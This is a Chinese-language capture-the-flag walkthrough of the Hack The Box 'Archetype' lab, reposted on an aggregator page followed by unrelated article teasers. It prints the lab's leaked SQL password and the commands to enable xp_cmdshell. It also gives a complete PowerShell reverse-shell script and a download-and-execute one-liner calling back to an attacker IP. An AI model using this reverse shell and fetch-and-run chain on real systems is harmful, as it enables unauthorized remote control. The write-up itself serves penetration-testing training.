[StartingPoint][Tier2]Archetype

Task 1

Which TCP port is hosting a database server?

(哪个端口开放了数据库服务)

$ nmap 10.129.95.187 -sC --min-rate 1000

image.png

1433

Task 2

What is the name of the non-Administrative share available over SMB?

(哪个非管理共享提供了SMB?)

$ smbclient -N -L 10.129.95.187

image.png

backups

Task 3

What is the password identified in the file on the SMB share?

(在 SMB 共享中识别的文件中的密码是什么?)

$ smbclient -N //10.129.95.187/backups

>dir

>get prod.dtsConfig

image.png

image.png

M3g4c0rp123

Task 4

What script from Impacket collection can be used in order to establish an authenticated connection to a Microsoft SQL Server?

(从 Impacket 集合中的哪个脚本可以用于与 Microsoft SQL Server 建立经过身份验证的连接?)

git clone https://github.com/SecureAuthCorp/impacket.git
cd impacket
pip3 install .
# OR:
sudo python3 setup.py install
# In case you are missing some modules:
pip3 install -r requirements.txt

mssqlclient.py

Task 5

What extended stored procedure of Microsoft SQL Server can be used in order to spawn a Windows command shell?

(Microsoft SQL Server 的哪个扩展存储过程可以用于生成一个 Windows 命令 shell?)

python3 mssqlclient.py ARCHETYPE/sql_svc@10.129.95.187 -windows-auth

image.png

xp_cmdshell

Task 6

What script can be used in order to search possible paths to escalate privileges on Windows hosts?

(用于搜索可能的路径以提升 Windows 主机权限的脚本是什么)

winpeas

Task 7

What file contains the administrator’s password?

(什么文件中包含的管理员密码?)

使用SELECT is_srvrolemember('sysadmin'); 用来检查当前用户是否属于 sysadmin 角色,即系统管理员角色。如果用户是 sysadmin 角色的成员,该命令将返回 1;否则,返回 0

image.png

没有启用xp_cmdshell

image.png

EXEC sp_configure 'Show Advanced Options', 1;
允许修改高级配置选项

RECONFIGURE;

确认操作

image.png

sp_configure;

查看sp_configure配置

image.png

EXEC sp_configure 'xp_cmdshell', 1;

使用sp_configure系存储过程,启用xp_cmdshell参数,来允许SQL Server调用操作系统命令

RECONFIGURE;

确认操作

image.png

>xp_cmdshell "powershell -c whoami";

image.png

$ vim reverse.txt

$LHOST = "10.10.16.8"; $LPORT = 10032; $TCPClient = New-Object Net.Sockets.TCPClient($LHOST, $LPORT); $NetworkStream = $TCPClient.GetStream(); $StreamReader = New-Object IO.StreamReader($NetworkStream); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); $StreamWriter.AutoFlush = $true; $Buffer = New-Object System.Byte[] 1024; while ($TCPClient.Connected) { while ($NetworkStream.DataAvailable) { $RawData = $NetworkStream.Read($Buffer, 0, $Buffer.Length); $Code = ([text.encoding]::UTF8).GetString($Buffer, 0, $RawData -1) }; if ($TCPClient.Connected -and $Code.Length -gt 1) { $Output = try { Invoke-Expression ($Code) 2>&1 } catch { $_ }; $StreamWriter.Write("$Output`n"); $Code = $null } }; $TCPClient.Close(); $NetworkStream.Close(); $StreamReader.Close(); $StreamWriter.Close()

image.png

$ 开启8000端口让服务器下载程序

image.png

> xp_cmdshell "powershell -c (Invoke-Expression (curl http://10.10.16.8:8000/reverse.txt -UseBasicParsing))";

服务端powershell反弹shell

image.png

$ nc -lvp 10032

image.png

image.png

获得了一个低权限用户

type c:\\Users\sql_svc\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt

查看历史命令

image.png

ConsoleHost_history.txt

User Flag

powershell 命令快速获取桌面文件命令

Ps>Get-ChildItem -Path "C:\Users\sql_svc\Desktop"

image.png

cmd
> dir "C:\Users\sql_svc\Desktop"

3e7b102e78218e935bf3f4951fec21a3

Root Flag

image.png

b91ccec3305e98240082d4474b848528

解题过程

1.通过smb共享文件获取到敏感文件
2.利用mssqlclient来操作Microsoft SQL进行xp_cmdshell命令执行
3.获取一个普通用户权限,读取Desktop目录下user.txt。这里再利用(c:\\Users\sql_svc\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt)存放的历史命令,成功获取到管理员smb泄露的权限密码
4.将获取到的smb管理员密码,通过psexec进行命令执行,成功提权,读取Desktop下的root.txt

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/800959.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

Rsync——远程同步命令

目录 一、关于Rsync 1.定义 2.Rsync同步方式 3.备份的方式 4.Rsync命令 5.配置源的两种表达方法 二、配置服务端与客户端的实验——下载 1.准备工作 2.服务端配置 3.客户端配置同步 4.免交互数据同步 5.源服务器删除数据是否会同步 6.可以定期执行数据同步 三、关…

JVM的简单介绍

目录 一、JVM的简单介绍 JVM的执行流程 二、JVM中的内存区域划分 1、堆(只有一份) 2、栈(可能有N份) 3、程序计数器(可能有N份) 4、元数据区(只有一份) 经典笔试题 三、JVM…

2024.3.28力扣每日一题——访问完所有房间的第一天

2024.3.28 题目来源我的题解方法一 模拟方法二 动态规划 题目来源 力扣每日一题;题序:1997 我的题解 方法一 模拟 使用一个Set存储已经访问过的房间号,直到Set中的元素个数等于房间数时停止模拟。 时间复杂度:O(day)。能够访问…

信息管理管理工程习题【1~4章】

1、将十进制68转换成二进制为( ),转换成八进制为( ),转换成十六进制为( )。 A. 1000100 102 40 B. 1000100 104 44 C. 1000101 102 40 D. 1000110 104 44 【答案】:B 2、…

如何恢复被.locked勒索病毒加密的服务器和数据库?

.locked勒索病毒有什么特点? .locked勒索病毒的特点主要包括以下几个方面: 文件加密:.locked勒索病毒会对受感染设备上的所有文件进行加密,包括图片、文档、视频和其他各种类型的重要文件。一旦文件被加密,文件的扩展…

淘宝商品描述API接口:轻松获取商品信息的新途径

淘宝商品描述API接口是淘宝开放平台提供的一种高效、便捷的新途径,旨在帮助开发者轻松获取淘宝商品的详细描述信息。通过这一接口,商家、开发者和用户都能获得商品标题、描述、属性、价格、图片等关键信息,从而满足各种业务需求。 在使用淘宝…

【Trick】AIGC翻译润色

1:可尝试在chat bar中提前输入以下内容: I want you to act as an English translator, spelling corrector and improver. I will speak to you in any language and you will detect the language, translate it and answer in the corrected and imp…

指针的深入理解(六)

指针的深入理解(六) 个人主页:大白的编程日记 感谢遇见,我们一起学习进步! 文章目录 指针的深入理解(六)前言一. sizeof和strlen1.1sizeof1.2strlen1.3sizeof和strlen对比 二.数组名和指针加减…

前端html+css+js常用总结快速入门

🔥博客主页: A_SHOWY🎥系列专栏:力扣刷题总结录 数据结构 云计算 数字图像处理 力扣每日一题_ 学习前端全套所有技术性价比低下且容易忘记,先入门学会所有基础的语法(cssjsheml)&#xff…

深度挖掘商品信息,jd.item_get API助您呈现商品全面规格参数

深度挖掘商品信息,特别是在电商平台上,对于商家、开发者和用户来说都至关重要。jd.item_get API作为京东开放平台提供的一个强大工具,能够帮助用户轻松获取商品的全面规格参数,进而为商品分析、推荐、比较等提供有力的数据支撑。 …

using和typename在C++中的用法

using关键字有两个主要用途: 1.类型别名:使用using可以为类型创建新的名称,这在模板编程中尤其有用。 using integer int; integer a 5; // 这里的integer就是int类型2.命名空间:using可以用来引入命名空间中的名字&#xff0c…

Liquid的Covenants:处理比特币脚本中的金额

1. 引言 Covenants契约是一种允许introspection自省的结构: 交易output可以对花费其的交易施加条件(超出特定的“必须提供自身的有效签名和特定的公钥”)。 Rusty Russell 之前研究过Covenants: Examining ScriptPubkeys in Bitcoin Scrip…

两相欠压继电器 WY-35A3 额定输入电压100V 导轨安装 JOSEF约瑟

系列型号: WY-35A4电压继电器;WY-35B4电压继电器; WY-35C4电压继电器;WY-35D4电压继电器; WY-35A4D电压继电器;WY-35A4T电压继电器; WY-35B4D电压继电器;WY-35B4T电压继电器&#xf…

人工智能时代过失犯理论的挑战与应对—以自动驾驶汽车交通肇事为例

内容提要以自动驾驶汽车为代表的人工智能产品致害所涉犯罪主体复杂多样、前置性规范缺失, 以及人工智能产品固有的自主与黑箱特性等问题给过失犯理论带来了变革的压力与挑战。传统过失犯理论、新过失犯理论以及客观归责理论都无法解决人工智能产品致害所涉过失犯罪认定问题。人…

【VMware】虚拟机及镜像Ubuntu安装

Vmware 一.VM是什么?有什么用?二.下载VMware Wworkstation Pro三.安装虚拟机四.安装镜像 一.VM是什么?有什么用? vmware是一款运行在windows系统上的虚拟机软件,可以虚拟出一台计算机硬件,方便安装各类操作…

K8s学习七(服务发现_2)

Ingress Service 主要用于集群内部的通信和负载均衡,而 Ingress 则是用于将服务暴露到集群外部,并提供灵活的 HTTP 路由规则。在实际应用中,它们通常结合使用,Service 提供内部通信和负载均衡,Ingress 提供外部访问和…

网络工程师笔记18(关于网络的一些基本知识)

网络的分类 介绍计算机网络的基本概念,这一章最主要的内容是计算机网络的体系结构-ISO 开放系统互连参考模型,其中的基本概念,例如协议实体、协议数据单元,服务数据单元、面向连接的服务和无连接的服务、服务原语、服务访问点、相…

蓝桥杯练习题 —— 高精度加法(python)

python优势 # encoding utf-8 # 开发者:xxx # 开发时间: 16:48 # "Stay hungry,stay foolish."a int(input()) b int(input())print(a b) 正常 # encoding utf-8 # 开发者:xxx # 开发时间: 16:48 #…

大数据分层存储架构:ODS、DWD、DWM与DWS详解

在大数据领域中,ODS、DWD、DWM和DWS代表了数据仓库的不同层次,它们共同构成了大数据的分层存储结构。这种结构的设计有助于提高数据查询效率,降低成本,并满足不同的业务需求。 ODS(Operational Data Store&#xff09…

计算机视觉领域主流优秀的模型的用处与区别,优劣。复合缩放方法,深度可分离卷积

目录 计算机视觉领域主流优秀的模型的区别,优劣 YOLO (You Only Look Once) ResNet、EfficientNet 优劣与应用场景